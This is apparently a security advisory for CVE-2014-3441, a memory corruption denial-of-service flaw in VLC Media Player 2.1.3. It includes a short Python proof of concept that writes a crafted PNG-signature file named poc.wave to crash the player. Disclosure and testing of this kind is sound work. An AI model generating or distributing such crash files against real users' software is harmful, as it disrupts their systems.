Release date:
Updated on:
Affected Systems:
VideoLAN VLC Media Player 2.1.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 67315
CVE (CAN) ID: CVE-2014-3441
VLC Media Player is a multimedia player.
VLC Media Player 2.1.3 and other versions contain a memory corruption vulnerability. Attackers can exploit this vulnerability to cause a denial of service (DoS).
<* Source: Aryan Bayaninejad
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#!/usr/bin/python
# Writes the crafted proof-of-concept data to poc.wave; the data begins with the PNG file signature.
data = b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x7F\xFF\xFF\x00\x00\x01\x02\x01\x03\x00\x00\x00\xBA\x1B\xD8\x84\x00\x00\x00\x03\x50\x4C\x54\x45\xFF\xA7\xC4\x1B\xC8\x00\x00\x00\x01\x74\x52\x4E\x53\x00\x40\xE6\xD8\x66\x00\x68\x92\x01\x49\x44\x41\x54\xFF\x05\x3A\x92\x65\x41\x71\x68\x42\x49\x45\x4E\x44\xAE\x42\x60\x82"
# Open in binary mode so the bytes are written unmodified on every platform.
outfile = open("poc.wave", "wb")
outfile.write(data)
outfile.close()
print("Created Poc")
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
VideoLAN
--------
The vendor has not yet provided a patch or upgrade. We recommend that users of the software watch the vendor's homepage to obtain the latest version:
http://www.videolan.org/